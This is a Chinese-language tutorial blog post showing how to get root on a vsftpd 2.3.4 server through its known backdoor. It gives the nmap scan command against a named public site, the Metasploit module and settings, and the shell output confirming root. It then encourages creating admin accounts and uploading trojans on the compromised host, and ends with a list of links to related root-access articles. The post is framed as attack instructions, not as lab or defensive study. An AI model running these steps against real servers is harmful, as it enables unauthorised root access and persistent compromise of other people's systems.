metasploit获取vsftp服务器root权限
vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。这 里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器、个人PC和应用程序的漏洞。开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit内置的nmap进行主机扫描
nmap -sT -A www.metasploit.com.cn -sT
port 21 vsftpd version 2到2.3.4
是指用隐蔽的tcp进行连接,-A是指在探测中对服务进行详细的版本测试。nmap是一款强大的扫描工具,简单的一些用法可以点击:《Nmap在实战中的高级用法》文章查看。
结果显示目标主机上运行着ftp服务器,版本为vsftpd2.3.4,这个版本的vsftpd存在漏洞,攻击者可以远程获取目标主机的root权限。
下面利用metasploit实施攻击过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果如下:
msf > search vsftpd Matching Modules ================ Name Disclosure Date Rank Description —- ————— —- ———– exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
利用该漏洞命令:
use exploit/unix/ftp/vsftpd_234_backdoor
这样提示符就会提示进入到该路径下,show options查看需要设置的相关项:
msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 21 yes The target port Exploit target: Id Name – —- 0 Automatic
提示需要设置RHOST(攻击目标的IP)、RPORT(目标端口),由于这里是攻击ftp软件,端口默认为21,我们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,一般是run或者exploit即可实施攻击.
结果显示已经获取了目标主机的root权限,建立管理员账号、上传木马等动作就可以开始了
whoami
root (已经获取了目标主机的root权限)
1 先用扫描目标站点 nmap -sT -A www.metasploit.com.cn -sT
2 port 21 vsftpd version 2到2.3.4 ( 此版本存在漏洞,可以利用)
3 搜索工具并利用 search vsftpd | use exploit/unix/ftp/vsftpd_234_backdoor
4 根据扫描信息,修改实际攻击目标ip,端口
5 run | exploit 执行命令
推荐阅读
-
Android 操作系统获取Root权限 原理详细解析
-
Android获取ROOT权限的实例代码
-
叶子猪手游模拟器如何ROOT 模拟器获取root权限方法
-
Android中Root权限获取的简单代码
-
ubuntu18.04获取root权限并用root用户登录的实现
-
三星Tab4怎么Root?三星Galaxy Tab4获取Root权限图文教程
-
Android 怎样像4.2.2一样通过su命令获取root权限
-
做为GPU服务器管理员,当其他用户需要执行某个要root权限的命令时,除了告诉他们root密码,还有没有别的办法?
-
Android手机获取root权限并实现关机重启功能的方法
-
Android 操作系统获取Root权限 原理详细解析